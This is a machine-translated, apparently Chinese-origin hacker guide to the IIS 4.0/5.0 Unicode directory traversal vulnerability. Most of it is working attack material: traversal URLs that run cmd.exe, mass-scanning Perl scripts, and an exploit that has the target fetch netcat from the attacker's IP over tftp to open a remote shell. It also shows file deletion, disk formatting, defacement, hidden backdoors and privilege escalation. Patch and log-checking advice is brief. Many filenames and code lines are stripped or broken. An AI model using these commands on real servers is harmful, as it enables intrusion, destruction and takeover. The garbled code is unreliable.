one. Existing vulnerabilities
1. Microsoft IIS 4.0/5.0 has an extended UNICODE directory traversal vulnerability, which is both a remote vulnerability and a local vulnerability.
Affected versions:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
Unaffected version:
Vulnerability description:
Microsoft IIS 4.0 and 5.0 both use the extended UNICODE characters to replace "/" and "\" to utilize "../"
A vulnerability in directory traversal.
Unauthorized users may access any known using the context space of the IUSR_machinename account
file. This account belongs to members of the Everyone and Users groups by default, so any with
Files that can be accessed by these user groups on the same logical drive can be deleted.
Modification or execution is just like a user can complete it by successfully logging in.
Test method:
/scripts/..%c1%1c../path/
%c0%af = /
%c1%9c = Solution:
The vulnerability patch is released with Microsoft Security Announcement MS00-057
(/technet/security/bulletin/)
You can download the patch from the following address:
IIS 4.0
/ntserver/nts/downloads/critical/q301625/
IIS 5.0
/windows2000/downloads/critical/q301625/
2. IIS 4.0/5.0 unicode decoding vulnerability causes file leakage or execution
IIS 4.0 and IIS 5.0 have a security vulnerability in the implementation of Unicode character decoding, which causes users to execute arbitrary commands remotely through IIS. When IIS opens a file, if the file name contains unicode characters, it will decode it. If the user provides some special encoding, it will cause IIS to open incorrectly or execute files outside of the web root directory.
For IIS 5.0/4.0 Chinese version, when IIS receives a URL request file name containing a special encoding such as "%c1%hh"
Or "%c0%hh", it will first decode it into: 0xc10xhh, and then try to open this file for Windows
Think 0xc10xhh might be unicode encoding, so it will decode it first, if 0x00<= %hh < 0x40,
The decoding format used is similar to the following format:
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
Therefore, with this encoding, we can construct many characters, such as:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
N %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
Attackers can use this vulnerability to bypass IIS path checking, execute or open any file.
(1) If the system contains an executable directory, any system commands may be executed. The following URL may
List the contents of the current directory:
/scripts/..%c1%1c../winnt/system32/?/c+dir
(2) It is also possible to use this vulnerability to view the content of the system file:
//..%c1%1c../..%c1%1c../winnt/
Rain Forest Puppy <rfp@> Test found that this problem is the same for the English version of IIS 4.0/5.0.
It exists, but the encoding format is slightly different, becoming "%c0%af" or "%c1%9c".
2. Temporary solution:
1. If executable CGI is not needed, you can delete the executable virtual directory, such as /scripts, etc.
2. If you really need an executable virtual directory, it is recommended that the executable virtual directory be in a separate partition.
Manufacturer patch:
Microsoft has issued a security bulletin MS00-78, which you can see in more detail at the following address:
/technet/Security/Bulletin/
The patch can be downloaded from the following address:
Microsoft IIS 4.0:
/ntserver/nts/downloads/critical/q301625/
Microsoft IIS 5.0:
/windows2000/downloads/critical/q301625/
two. The principle of UNICODE vulnerability
The above vulnerabilities start from Chinese IIS4.0+SP6, and also affect Chinese WIN2000+IIS5.0 and Chinese WIN2000+IIS5.0+SP1. * Traditional Chinese also has such vulnerabilities.
In the Chinese version of WIN2000, there is a bug in UNICODE encoding, and in UNICODE encoding
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
In NT4 / encoded as %c1%9c
In English version: WIN2000 English version %c0%af
However, information obtained from certain foreign sites shows that the following encoding can detect the vulnerability, %c1%pc
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af
three. Detection of UNICODE vulnerability
The following are all taken the Chinese version of WIN2K as an example. If it is another NT version, replace the simplest detection method of %c1%1c in the following code according to the encoding described above:
For example, there is a WIN2K host with an IP address. We can enter /scripts/..%c1%1c../winnt/system32/?/c+dir in the address bar. If this vulnerability exists, we can see the following content: (For example, assume that there is no file in the SCRIPTS directory)
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..
In fact, it can also be changed to this 127.0.0.1/scripts/..%c1%1c../winnt/system32/?/r+dir, that is, the substitution of the letter r=c. Regarding the letter r, the letter can be equivalent to c, we can get an explanation through cmd/?.
Of course, if the administrator of the target host deletes the directory, we will not be able to see it, but the following directories can also be used for testing.
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/?/c+dir
After running, we can see
Directory of c:\program files\common files\system\msadc
2000-08-06 19:16
.
2000-08-06 19:16
..
(The following content is omitted)
19 File(s) 1,233,840 bytes
2 Dir(s) 6,290,644,992 bytes free
If the vulnerability and directory exist at the same time, you can see everything in the corresponding directory on the WEB page. This is only a vulnerability detection for a single target host. If you want to detect UNICODE vulnerability on an NT host on a certain IP segment, we need to use scanning software similar to the following. The following source code was written by a foreign hacker. Of course, only the English version of NT is scanned. To scan the Chinese version, corresponding modifications are required.
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c
#perhaps a public script to do some evil stuff with this exploit later... h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while ()
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}
sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}
You can run the above pl program on the machine (of course you need to install PERL), or you can run it remotely.
Runs on the server.
Four. Commands for simple exploitation of UNICODE encoding vulnerabilities
Generally, the directory we see with /scripts/..%c1%1c../winnt/system32/?/c+dir is empty: (for example)
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..
If we enter this way: /scripts/..%c1%1c../winnt/system32/?/c+dir+c:\ You can see the directory and files of the host c: disk.
Some other simple usages:
1. Display the file content
If you want to display one of the text files inside, we can enter it like this (htm, html, asp, bat and other files are the same) /scripts/..%c1%1c../winnt/system32/?/c+type+c:\
Then the contents of the file can be displayed through IE.
2. Command to create a folder
/scripts/..%c1%1c../winnt/system32/?/c+md+c:\badboy runs and we can see
Returns the result like this:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
English means CGI error
The specific CGI application is incorrect and the complete HTTP title cannot be returned. The returned title is:
3. Delete empty folder command
/scripts/..%c1%1c../winnt/system32/?/c+rd+c:\badboy
Return information as above
4. The command to delete a file
/scripts/..%c1%1c../winnt/system32/?/c+del+c:\
Return information as above
5. The command to rename the copy file
/scripts/..%c1%1c../winnt/system32/?/c+copy+c:\
Return information:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
1 file(s) copied.
, display the current environment variables of the target host
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+set
Returned information:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=E:\Documents and Settings\All Users
AUTH_TYPE=Negotiate
AUTH_USER=BADBOYCL-DQQZQQ\badboy
CASL_BASEDIR_ENV=E:\scan\CyberCop Scanner\casl
CommonProgramFiles=E:\Program Files\Common Files
COMPUTERNAME=BADBOYCL-DQQZQQ
ComSpec=E:\WINNT\system32\
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=127.0.0.1
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADA
AMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAY
QBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vz
SAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_I
7. COPY all files in a certain folder to another folder at one time
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+xcopy c:\badboy c:\inetpub\wwwroot
Returned information:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
We check the c:\inetpub\wwwroot folder, and all the c:\badboy in it is copied to this directory
8. Cut a folder into the specified directory
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+move c:\badboy c:\inetpub\wwwroot Haha, it can still be done. The length of time depends on the number of files.
9. Display the file content of the same file type under a certain path
http://127.0.0.1/scripts/..%c1%1c..\winnt/system32/?/n+/v+""+c:\inetpub\wwwroot\*.ht*
It's fully displayed! Similarly, there are many commands that can be executed, you can try it, but some will take a long time, and some will not be executed. Explain the + sign, here + is equal to the space bar. Of course, you can also use the space bar. After running with the space bar, it will be converted to %20 and %c1%1c=/. It is the same principle. For folders with more than 8 letters, it is a bit different if we want to see the content inside. For example, when we want to see the content in the Program Files folder of the target host, we should enter it like this.
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+dir+c:\progra~1
Here you cannot use + or %20 to replace the space between program and files.
To see the aa bb folder, the method is to see the following http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+dir%20e:\aabb~1
aa bb=aabb~1
If there is aab b folder in the same directory, use this code to view the contents in the aab b folder http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+dir%20e:\aabb~2
And so on.
five. How to simply modify the target host's web page
Generally speaking, we need to modify the web file of the target host. The commonly used method is to use echo echo and pipeline tools.
The functions of these commands and pipeline tools are as follows:
D:\>echo/?
Display information, or turn the command response on or off.
ECHO [ON | OFF]
ECHO [message]
Type ECHO only without adding parameters to display the current ECHO settings.
Pipe Tools >> Functions
"> >>" is to redirect the output generated by the command, such as writing to a file or outputting it to the printer.
>>The generated content will be appended to the file,>overwrite the original file content.
Let’s take a look at some of the contents in cmd/?:
Note that if the string has quotes, multiple commands separated by the command separator '&&' can be accepted. And, for compatibility reasons, /X is the same as /E:ON, /Y is the same as /E:OFF, and /R is the same as /C. Ignore any other command options.
If /C or /K is specified, the rest of the command line after the command option is processed as the command line; in this case, the following logic is used to process the quote characters ("):
1. Quotation characters on the command line will be preserved if all the following conditions are met:
- Without /S command option
- Two full quote characters
- There are no special characters between two quote characters, the special characters are
A: <>()@^|
- Have at least one whitespace character between two quote characters
- There is at least one executable name between two quote characters.
2. Otherwise, the old way is to see if the first character is a quote character. If so, discard the beginning character and delete the last quote character on the command line, and retain the text after the last quote character:
What inspiration can be obtained from the above?
We know that when the IIS loader detects a special character "&|(,;%<>", it will return a 500 error if it is found that there are these characters, so you cannot use the pipe character directly.
pass
/scripts/..%c1%1c../winnt/system32/?/c+echo+badboy+> c:\
We can see the prompt HTTP 500 - Internal Server Error Internet Explorer
After repeated tests and the prompts of the cmd content above, we can find that "quotation mark characters can be used. Yuange of Zhonglian Green League (Yuan Ge) has issued an announcement about this character. I think maybe it is also the prompt from the cmd/? information above (it is purely a personal guess. If not, please don't be surprised).
We want to use echo and > in combination, so we can do this.
/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+badboy+> c:\
Note that the difference from the initial command is that there is an " character after cmd. After running, we can see the result that returns:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
English means CGI error. The specific CGI application is incorrect and the complete HTTP title cannot be returned. The returned title is:
In fact, we have written badboy into the c:\ file.
Using this method, we can create files such as .bat .txt .asp .htm .html. This can be said to be the beginning of a fatal blow to a website with this vulnerability, especially when writing .bat files. If we add format del and other commands into it, what do you think will happen? ?
Go back to the question of modifying the website page.
For example, if you want to modify c:\inetpub\wwwroot\
We can enter in the address bar like this:
/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+your+site+has+unicode+bug+> c:\inetpub\wwwroot\
Then when looking at his homepage, it has been modified to
your site has unicode bug
Things are that simple. Any ordinary person can do the simplest HACK behavior to the target host with this vulnerability through the address bar.
Of course, if we want to facilitate input, we can change the file with other names, for example
/scripts/..%c1%1c../winnt/system32/?/c+copy+c:\winnt\system32\+c:\inetpub\scripts\
You can use it directly afterwards
/scripts/?/c+echo+badboy+> c:\
six. Analysis of some UNICODE scan programs available on the network
1. Simple and easy to use
Operating platform: win9x, NT4, WIN2K
The software can be found in some Chinese hacker software collections. It is a command-line scanning tool written in C++ for UNICODE encoding vulnerability of an IP segment by Redp0wer, a HACK technology enthusiast in mainland China. The tool scans quickly and accurately. Scan work can be performed on local and remote NT meat machines and generate a simple scan report (only the IP address of the NT host of the scanned IP segment is recorded). This software tests UNICODE encoding vulnerabilities for the target NT host scripts, IISADMPWD, msadc, cgi-bin, and _vti_bin directories.
If you can only scan a certain IP segment on the local machine and are a user with a fixed IP address, when using the software, you must note that your scanning behavior actually exposes you to the other party. And it is easy for the other party to catch you and sue you for invading. We can find the execution footprint from the event viewer
Application log c:\WINNT\system32\config\
Security log C:\WINNT\System32\config\
System log C:\WINNT\system32\config\
When we analyze the source code of this software, we can see: GET /%s/%s/winnt/system32/?/c%scopy%s%s:\\\winnt\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\� So, when you don't know how to eliminate your footprints and use a meat machine to perform scans, it's best not to use this software as your scanning tool.
2. A more comprehensive UNICODE tool
As long as PERL is supported, this tool can be used to scan the target host for UNICODE encoding vulnerability. This program can scan and test all NT versions with UNICODE encoding vulnerabilities. The following is the source program of the software. I will not explain in detail how to operate it.
#!/usr/bin/perl
#
# checks a host for the recent IIS unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Origionally Stealthmode316, modifications by Roeland
#
#
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK
Example: ./ :80\n";}
#($host,$port)=split(/:/,@ARGV[0]);
($host = @ARGV[0]);
$port = 80;
$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 2
my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts..%c1%9c../winnt/system32/?/c+dir\n";}}
# ---------------test method 3
my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%pc../winnt/system32/?/c+dir\n";}}
# ---------------test method 4
my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%9v../winnt/system32/?/c+dir\n";}}
# ---------------test method 5
my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%qf../winnt/system32/?/c+dir\n";}}
# ---------------test method 6
my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%8s../winnt/system32/?/c+dir\n";}}
# ---------------test method 7
my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%1c../winnt/system32/?/c+dir\n";}}
# ---------------test method 8
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%9c../winnt/system32/?/c+dir\n";}}
# ---------------test method 9
my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 10
my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%e0%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 11
my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f0%80%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 12
my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f8%80%80%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 13
my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%fc%80%80%80%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 14
my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/\?/c\+dir HTTP/1.0\r\n\r\n
");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/\?/c\+dir\n";}}
if ($flag!=1) {
print "$host: Not vulnerable\n";
exit;
}
sub sendraw {
$hbn = gethostbyname($host);
if ($hbn) {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,gethostbyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)) {
my @in;
select(S);
$|=1;
print $pstr;
while(){
push @in, $_;
}
select(STDOUT);
close(S);
return @in;
} else {
print "$host: Can't connect\n";
exit;
}
} else {
print "$host: Host not found\n";
exit;
}
}
3. Attack NIT_UNICODE software set
Download address/0011-exploits/NIT_UNICODE.zip
The compressed package contains the following files:
--------------------------------------------------------------------------------------------------------------------------------
-----PERL program that executes the TFTP process
-----A netcat * that sets the telnet port to 99
-----TFTP setting software
-----Help File
flie_id.diz
----Instructions and Examples
This package mainly utilizes unicode encoding vulnerability to upload it to the target host and start it, allowing the attacker to log in to the target host through the telnet port 99 of the target host for attack.
When using the following program, you need to modify some things. Find the sentence $command="tftp -i . GET c:\\\inetpub\\scripts\”; and modify it to your IP address and then save it. This sentence mainly passes the name from your host to the target host c:\inetpub\scripts\. In addition, it is necessary to make corresponding modifications to the ..%c0%af.. in the program according to the NT version of the target host. For example, if the target host is WIN2K, it is modified to ..%c1%1c..
#!/usr/bin/perl
# This is for educational purpose's only!
# WHO LET THEM DOGS OUT!
# Use first to see if this is a vulnerable server!
# Based of the script from Roelof Temmngh
# Files=,,,,
use Socket;
if ($#ARGV<0) {die "Usage: IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ //) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the . to your ip address. Duh!
$command="tftp -i . GET c:\\inetpub\\scripts\\";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ // )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "\n
Hit CTRL-C if this is Hanging";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# NIT IN THE YEAR 2000
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ //) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the . to your ip address. Duh!
$command="tftp -i . GET c:\\inetpub\\scripts\\";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ // )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "\n
Hit CTRL-C if this is Hanging";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# NIT IN THE YEAR 2000
seven. Improvement of unicode encoding vulnerability
It does not mean that there is a UNICODE coding vulnerability. The following method can be completely successful. It mainly gives you a kind of thinking.
Methods, learn and apply them actively, learn from one example and apply them to others, reproduce more and better utilization methods, and improve the target host attack
The chance of hitting success makes the harm of UNICODE coding vulnerabilities more important.
Understand the content in the MCD Help, especially in this regard:
Note that if the string has quotes, it is acceptable to separate it with the command separator '&&'
multiple commands. And, for compatibility reasons, /X is the same as /E:ON, and /Y is the same as
/E:OFF is the same, and /R is the same as /C. Ignore any other command options.
If /C or /K is specified, the rest of the command line after the command option will be used as the command line
In this case, the following logic will be used to process the quote characters ("):
1. If all the following conditions are met, the quote characters on the command line will be
reserve:
- Without /S command option
- Two full quote characters
- There are no special characters between two quote characters, the special characters are
A: <>()@^|
- Have at least one whitespace character between two quote characters
- There is at least one executable name between two quote characters.
2. Otherwise, the old way is to see if the first character is a quote character, if
Yes, discard the beginning character and delete the last quote character on the command line.
Keep the text after the last quote character.
Be familiar with the conversion format of using ECHO writing method to write some special characters to text files
<Equal to %3C >Equal to %3E /Equal to %2F \Equal to %5C =Equal to %3D +Equal to %2B (Equal to %28
) equals %29 # equals %23 $ equals %24 % equals %25 ^ equals %5E & equals %26 " equals %22
|Equal to %7C;Equal to %3B 'Equal to %27 :Equal to %3A ?Equal to %3F ,Equal to %2C ~Equal to %7E
! is equal to %21
The other three characters can be written directly - @ *
warn:
All the following methods are serious dangers, and host managers can detect their own hosts through the following methods
to understand the serious consequences of the vulnerability; individual HACK enthusiasts please test it on this machine.
All consequences and legal disputes caused by the experiment shall be borne by the experimenter himself.
1. Bat command method
Many articles do not introduce how to exploit BAT commands in unicode encoding vulnerabilities, but actually use them.
Batch processing can execute many commands that cannot be executed in the address bar and can simplify the process of inputting.
example:
del /f /s /q c:\files\*.*
rd c:\files
We can create and execute
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+del%20/f%20/s%20/q%20c:\files\*.*>
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+rd%20c:\files>>
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+baddel
As a result, the files directory and files in the C drive were deleted.
If we change the batch process to format d:/q, then the D disk will be formatted.
Similarly, you can use batch processing to perform more attacks, so you need to review the commands and applications of DOS.
Note: The code in the third line above is executed, do not enter .bat here
2. The use of attrib
Use this command to check file properties and modify file properties.
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?c:\inetpub\wwwroot\
After running, we can see the file attributes that we often cannot modify the file because the file is set to read-only.
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?%20%2br%20%2bh%20d:\inetpub\wwwroot\
After running, we can set the file to be read-only and hidden. If we put a backdoor program
Hide it and the management does not set all files to be visible, so is it very convenient to upload things?
What was discovered by the administrator?
Note that %2b is equal to +
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?%20-r%20-h%20d:\inetpub\wwwroot\
After running, uninstall the file's properties.
3. The use of ftp
Sometimes we need to upload some files you want to use to the target host from an FTP host with permissions.
For examples, of course you have to put these files first in your space.
……/?/c+echo+open+*.*.*.*>
……/?/c+echo+user>>
……/?/c+echo+pass>>
……/?/c+echo+get+>>
……/?/c+echo+bye>>
Then run
……/cmd".exe?/c+ftp+-s:
……/?/c+del
After completing the above content, it is already in the inetpub/scripts directory
The rest depends on how you use the software
/scripts/..%c1%1c../winnt/system32/?/c+c:\inetpub\scripts\n
4. TFTP application
Regarding the application of TFTP, we have introduced the tool introduction in the full guide-5, which can be used in WIN9X
Or execute under NT or WIN2K, the prerequisite is that you need to install the PERL server program on the machine.
It's a little difficult for ordinary enthusiasts.
In fact, if you use an NT system or you own an NT meat machine, you can use WINNT\SYSTEM32
This software is downloaded.
tftp/?
Transfers files to and from a remote computer running the TFTP service.
TFTP [-i] host [GET | PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
Help is in English, please translate it yourself.
Command code on UNICODE:
/scripts/?-i+127.0.0.1+get+
5. ASP-related issues
Generally speaking, most NT machines use WEB programs and SQL databases written by ASP.
Everyone knows that the leak of ASP code means that the ASP source code you have worked hard to write is obtained for free, and at the same time, your site is
It is also easy to be attacked. There are many types of vulnerabilities that have been leaked in ASP code. Similarly, under UNICODE encoding vulnerability, your ASP
Source code can also be easily obtained.
Assuming yours is a good program, then the intruder can view your files through the type command.
../?/type c:\inetpub\wwwroot\
Or through the copy command
../?/copy c:\inetpub\wwwroot\ c:\inetpub\wwwroot\
Then directly download your source code and find your database file through analysis.
If you are using SQL services to make databases, intruders can view your ASP and
Source code, through analysis, find your username and password, and then attack through SQL remote management client.
So, what safety is there for your business secrets and website information?
The intruder can also upload an ASP backdoor program (ASE, you should have heard of and used it) in your host and hide it.
Get up, even if you patch the UNICODE vulnerability in the future, the intrusion can still be done before you discover it.
View, modify, and delete WEB files on your host.
6. Obtain super user permissions
You can use some hacking software (such as l0phtcrack) to brute-force cracking in your SAM file.
You can also use the upload method introduced above to transfer and to the target host.
Then use some software or methods to obtain the computer name of the target host, and then use it
iuser_Computer Upgrade to Administrator
/scripts/?IUSR_Computer Name
Then what else can't be done? It is equivalent to fully controlling the host.
eight. Unicode security issues
1. Unicode vulnerability solution
Simple solution:
Restrict network users' access and calling CMD permissions,
If there is no need to use the SCRIPTS or MSADC directory, delete the folder or change the name.
Do not use the default WINNT path when installing the NT system, you can change it to badboy or other folders.
Of course, the best way is to download the patch provided by m$, the most famous patch company.
The vulnerability patch is released with Microsoft Security Announcement MS00-057
(/technet/security/bulletin/)
You can download the patch from the following address:
IIS 4.0
/ntserver/nts/downloads/critical/q301625/
IIS 5.0
/windows2000/downloads/critical/q301625/
2. Check whether the hacker exploits unicode vulnerability
Check the LOG log
Keep web access records in winnt\system32\logfiles\w3svc1\ directory
If you have been accessed by someone using UNICODE vulnerability, we can see similar records in the log
13:46:07 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 401
13:46:07 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 200
If someone has ever executed COPY, del, echo, .bat, etc., commands with intrusion behavior
13:47:37 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 401
13:47:37 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 502
The logs running FTP can be found in the winnt/system32/logfiles\msftp\svc1 directory
If someone has executed an FTP command, I can see similar records in the log file
